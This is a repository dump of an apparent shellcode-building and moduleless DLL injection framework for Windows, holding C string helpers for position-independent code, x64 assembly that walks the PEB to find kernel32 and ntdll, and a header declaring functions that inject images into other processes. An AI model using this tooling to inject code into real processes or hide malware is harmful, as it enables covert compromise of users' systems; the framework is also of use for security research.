121 | while (*cp)
122 | {
123 | s1 = cp;
124 | s2 = (char *) str2;
125 |
126 | while ( *s1 && *s2 && !(*s1-*s2) )
127 | s1++, s2++;
128 |
129 | if (!*s2)
130 | return(cp);
131 |
132 | cp++;
133 | }
134 |
135 | return(NULL);
136 | }
137 |
138 | int my_sh_wcsicmp(wchar_t * dst1,wchar_t * src1) //wchar用于不区分大小写比较字符串是否相同
139 | {
140 | int ch1, ch2;
141 | ULONG len1,len2;
142 | ULONG i,j;
143 | PUCHAR p1,p2,z1,z2;
144 | char dst[256]={0};
145 | char src[256]={0};
146 | p1=(PUCHAR)dst1;
147 | p2=(PUCHAR)src1;
148 |
149 | len1=my_sh_wcslen(dst1);
150 | len2=my_sh_wcslen(src1);
151 |
152 | for (i=0,j=0;i= 'A') &&(ch1 <= 'Z') )
165 | ch1 += 0x20;
166 | if ( ((ch2 = (unsigned char)(*(z2++))) >= 'A') &&(ch2 <= 'Z') )
167 | ch2 += 0x20;
168 | } while ( ch1 && (ch1 == ch2) );
169 | return(ch1 - ch2);
170 | }
171 |
172 | wchar_t* my_sh_wcscat (wchar_t* dst,wchar_t* src)
173 | {
174 | wchar_t * cp = dst;
175 | while( *cp )
176 | cp++; /* find end of dst */
177 | while( *cp++ = *src++ ) ; /* Copy src to end of dst */
178 | return( dst ); /* return dst */
179 |
180 | }
181 |
182 | char* my_sh_strcat (char * dst,const char * src)
183 | {
184 | char * cp = dst;
185 | while( *cp )
186 | cp++; /* find end of dst */
187 | while( *cp++ = *src++ ) ; /* Copy src to end of dst */
188 | return( dst ); /* return dst */
189 |
190 | }
191 |
192 | BOOLEAN Is64Os()
193 | {
194 | #ifndef HHL_DEBUG
195 | //进行shellcode的重定位
196 | // ULONG64 offset=ReleaseRebaseShellCode64();
197 | PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End);//生成shellcode时候恢复回来
198 | #endif
199 | SYSTEM_INFO si;
200 | lpData->xGetNativeSystemInfo(&si);
201 | if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 ||
202 | si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_IA64 )
203 | {
204 | return TRUE;
205 | }
206 | else
207 | {
208 | return FALSE;
209 | }
210 | }
211 |
212 |
213 |
214 |
215 | int my_sh_memcmp(void* pv1,void* pv2,size_t cb)
216 | {
217 | size_t i;
218 | int d;
219 | for (i=0, d=0; i < cb && !d; i++)
220 | d = (*(const BYTE *)pv1) - (*(const BYTE *)pv2);
221 | return d;
222 | }
223 |
224 | void* my_sh_memcpy(void* pvDest,void* pvSrc,size_t cb)
225 | {
226 | size_t i=0;
227 | for (i=0; i < cb; i++)
228 | ((BYTE *)pvDest)[i] = ((const BYTE *)pvSrc)[i];
229 | return pvDest;
230 | }
231 |
232 | void* my_sh_memset(void* pv,int c,size_t cb)
233 | {
234 | size_t i=0;
235 | for (i=0; i < cb; i++)
236 | ((BYTE *)pv)[i] = (BYTE)c;
237 | return pv;
238 | }
239 | void my_sh_zeromem(PVOID Destination,SIZE_T Length)
240 | {
241 | my_sh_memset(Destination,0,Length);
242 | }
243 |
244 | void ShellCode_Ntapi_Utility_End()
245 | {
246 | int i=0;
247 | i=i+1;
248 | return;
249 | }
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode_ntapi_utility.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include "64nativeapi.h"
6 | #include "64ShellCode.h"
7 |
8 | #ifdef __cplusplus
9 | extern "C"
10 | {
11 | #endif
12 |
13 | int my_sh_strcmp(const char *dst, const char *src);
14 | int my_sh_stricmp(char *dst, char *src);
15 | int my_sh_wcsicmp(wchar_t * dst1,wchar_t * src1);
16 | ULONG my_sh_wcslen (wchar_t * wcs);
17 | int my_sh_strlen ( char* str );
18 | char* my_sh_strstr (char * str1,char * str2);
19 | char* my_sh_stristr(char* pString,char* pFind);
20 | char * my_sh_strupr(char *str);
21 | char * my_sh_strlwr(char *s);
22 |
23 | wchar_t* my_sh_wcscat (wchar_t * dst,wchar_t * src);
24 | char* my_sh_strcat (char * dst,const char * src);
25 |
26 | int my_sh_memcmp(void* pv1,void* pv2,size_t cb);
27 | void* my_sh_memcpy(void* pvDest,void* pvSrc,size_t cb);
28 | void* my_sh_memset(void* pv,int c,size_t cb);
29 | void my_sh_zeromem(PVOID Destination,SIZE_T Length);
30 |
31 |
32 |
33 | #ifdef __cplusplus
34 | }
35 | #endif
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 | void ShellCode_Ntapi_Utility_End();
64 |
65 |
66 |
67 |
68 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/Debug/64hhl_ring3_utility.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/GetRing3ApiAddr.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/GetRing3ApiAddr.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/test.asm:
--------------------------------------------------------------------------------
1 | .data
2 |
3 |
4 | .code
5 |
6 |
7 | EXTRN ShellCode_Entry:PROC ;this function is in c
8 |
9 |
10 |
11 | PUBLIC FUNC ;export FUNC function to c
12 |
13 | FUNC proc
14 | MOV RAX, 1234
15 | RET
16 | FUNC endp
17 |
18 |
19 | PUBLIC AlignRSPAndCallShEntry ; Marking AlignRSP as PUBLIC allows for the function to be called as an extern in our C code.
20 |
21 | AlignRSPAndCallShEntry PROC
22 | push rsi ; Preserve RSI since we're stomping on it
23 | mov rsi, rsp ; Save the value of RSP so it can be restored
24 | and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
25 | sub rsp, 020h ; Allocate homing space for ExecutePayload
26 | call ShellCode_Entry ; Call the entry point of the payload
27 | mov rsp, rsi ; Restore the original value of RSP
28 | pop rsi ; Restore RSI
29 | ret ; Return to caller
30 | AlignRSPAndCallShEntry ENDP
31 |
32 |
33 |
34 | PUBLIC get_kernel32_peb_64
35 |
36 | get_kernel32_peb_64 PROC
37 |
38 | mov rax,30h
39 | mov rax,gs:[rax] ;
40 | mov rax,[rax+60h] ;
41 | mov rax, [rax+18h] ;
42 | mov rax, [rax+10h] ;
43 | mov rax,[rax] ;
44 | mov rax,[rax] ;
45 | mov rax,[rax+30h] ;DllBase
46 | ret
47 |
48 | get_kernel32_peb_64 ENDP
49 |
50 |
51 | PUBLIC get_ntdll_peb_64
52 |
53 | get_ntdll_peb_64 PROC
54 |
55 | mov rax,30h
56 | mov rax,gs:[rax] ;
57 | mov rax,[rax+60h] ;
58 | mov rax, [rax+18h] ;
59 | mov rax, [rax+10h] ;
60 | mov rax,[rax] ;
61 | mov rax,[rax+30h] ;
62 | ret
63 |
64 | get_ntdll_peb_64 ENDP
65 |
66 |
67 |
68 |
69 | PUBLIC MyShellCodeFinalEnd
70 |
71 | MyShellCodeFinalEnd PROC
72 | xor rax,rax
73 | ret
74 | MyShellCodeFinalEnd ENDP
75 |
76 | END
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Release/64_shellcode_main.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/ShellCodeFrame_x64.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/ShellCodeFrame_x64.ncb
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/ShellCodeFrame_x64.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "64hhl_ring3_utility", "64hhl_ring3_utility\64hhl_ring3_utility.vcproj", "{BF58DCBE-3F38-4F72-9931-61DB1E52511D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.Build.0 = Debug|Win32
16 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.ActiveCfg = Debug|x64
17 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.Build.0 = Debug|x64
18 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.ActiveCfg = Release|Win32
19 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.Build.0 = Release|Win32
20 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.ActiveCfg = Release|x64
21 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/ShellCodeFrame_x64.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/ShellCodeFrame_x64.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/clear.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo ----------------------------------------------------
3 | echo By MoreWindows (http://blog.csdn.net/MoreWindows)
4 | echo Press any key to delete all files with ending:
5 | echo *.idb *.ncp *.obj *.pch *.tmp *.sbr
6 | echo *.tmp *.pdb *.bsc *.ilk *.ncb
7 | echo *.sdf *.dep *.ipch *.tlog *.opt
8 | echo There are Visual C++ and Visual Studio junk
9 | echo ----------------------------------------------------
10 | pause
11 | del /F /S /Q *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.ncb *.opt *.sdf *.dep *.ipch
12 | pause
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/Release/TestShellcode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/Release/TestShellcode.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/Release/hhl_shellcodeframe.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/Release/hhl_shellcodeframe.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/ShellCodeFrame_x86.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hhl_shellcodeframe", "hhl_shellcodeframe\hhl_shellcodeframe.vcproj", "{B0E6C01A-2E12-48C9-BB9A-49405143A91D}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestShellcode", "TestShellcode\TestShellcode.vcproj", "{4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestDll", "TestDll\TestDll.vcproj", "{2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Win32 = Debug|Win32
13 | Debug|x64 = Debug|x64
14 | Release|Win32 = Release|Win32
15 | Release|x64 = Release|x64
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.ActiveCfg = Debug|Win32
19 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.Build.0 = Debug|Win32
20 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|x64.ActiveCfg = Debug|x64
21 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|x64.Build.0 = Debug|x64
22 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.ActiveCfg = Release|Win32
23 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.Build.0 = Release|Win32
24 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|x64.ActiveCfg = Release|x64
25 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|x64.Build.0 = Release|x64
26 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|Win32.ActiveCfg = Debug|Win32
27 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|Win32.Build.0 = Debug|Win32
28 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|x64.ActiveCfg = Debug|x64
29 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|x64.Build.0 = Debug|x64
30 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|Win32.ActiveCfg = Release|Win32
31 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|Win32.Build.0 = Release|Win32
32 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|x64.ActiveCfg = Release|x64
33 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|x64.Build.0 = Release|x64
34 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|Win32.ActiveCfg = Debug|Win32
35 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|Win32.Build.0 = Debug|Win32
36 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|x64.ActiveCfg = Debug|x64
37 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|x64.Build.0 = Debug|x64
38 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|Win32.ActiveCfg = Release|Win32
39 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|Win32.Build.0 = Release|Win32
40 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|x64.ActiveCfg = Release|x64
41 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|x64.Build.0 = Release|x64
42 | EndGlobalSection
43 | GlobalSection(SolutionProperties) = preSolution
44 | HideSolutionNode = FALSE
45 | EndGlobalSection
46 | EndGlobal
47 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/ShellCodeFrame_x86.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/ShellCodeFrame_x86.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | 动态链接库:TestDll 项目概述
3 | ========================================================================
4 |
5 | 应用程序向导已为您创建了此 TestDll DLL。
6 |
7 | 本文件概要介绍组成 TestDll 应用程序的
8 | 的每个文件的内容。
9 |
10 |
11 | TestDll.vcproj
12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件,
13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 |
15 | TestDll.cpp
16 | 这是主 DLL 源文件。
17 |
18 | 此 DLL 在创建时不导出任何符号。因此,在生成此 DLL 时
19 | 将不会产生 .lib 文件。如果希望此项目
20 | 成为其他某个项目的项目依赖项,则需要
21 | 添加代码以从 DLL 导出某些符号,
22 | 以便产生一个导出库,或者,也可以在项目“属性页”对话框中的
23 | “链接器”文件夹中,将“常规”属性页上的
24 | “忽略输入库”属性设置为“是”。
25 |
26 | /////////////////////////////////////////////////////////////////////////////
27 | 其他标准文件:
28 |
29 | StdAfx.h, StdAfx.cpp
30 | 这些文件用于生成名为 TestDll.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
31 |
32 | /////////////////////////////////////////////////////////////////////////////
33 | 其他注释:
34 |
35 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
36 |
37 | /////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Release/TestDll.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/TestDll.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/TestDll.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.vcproj.LF-20170306AJGT.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/dllmain.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/stdafx.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/stdafx.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/targetver.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/ModuleLess.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/ModuleLess.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/ModuleLess.h:
--------------------------------------------------------------------------------
1 | #ifndef _MODULELESS_H_
2 | #define _MODULELESS_H_
3 |
4 | typedef struct _SHELL_CODE_PARAM
5 | {
6 | PVOID lpFileBase;
7 | LPVOID lpReserved;
8 | LPVOID lpProcName;
9 | LPVOID lpRunCmd;
10 | }SHELL_CODE_PARAM, *PSHELL_CODE_PARAM;
11 |
12 | typedef BOOL (WINAPI *DLL_MAIN)( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved);
13 |
14 | typedef VOID (WINAPI *pRunDll)(LPCWSTR pszRunCmd);
15 |
16 | namespace CModuleLess
17 | {
18 | BOOL ModuleLessLoad(PVOID lpFileBase,SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
19 | void ShellCodeModuleLessLoad(PVOID lpFileBase,SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
20 | BOOL ModuleLessInject(DWORD dwProcessId, PVOID lpFileBase, SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
21 | BOOL Wow64ModuleLessInjectToX64(DWORD dwProcessId, PVOID lpFileBase, SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
22 | }
23 |
24 | #endif
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/ReadMe.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/ReadMe.txt
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Release/TestShellcode.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Release/TestShellcode.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Release/TestShellcode.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.aps
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.rc
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.cpp
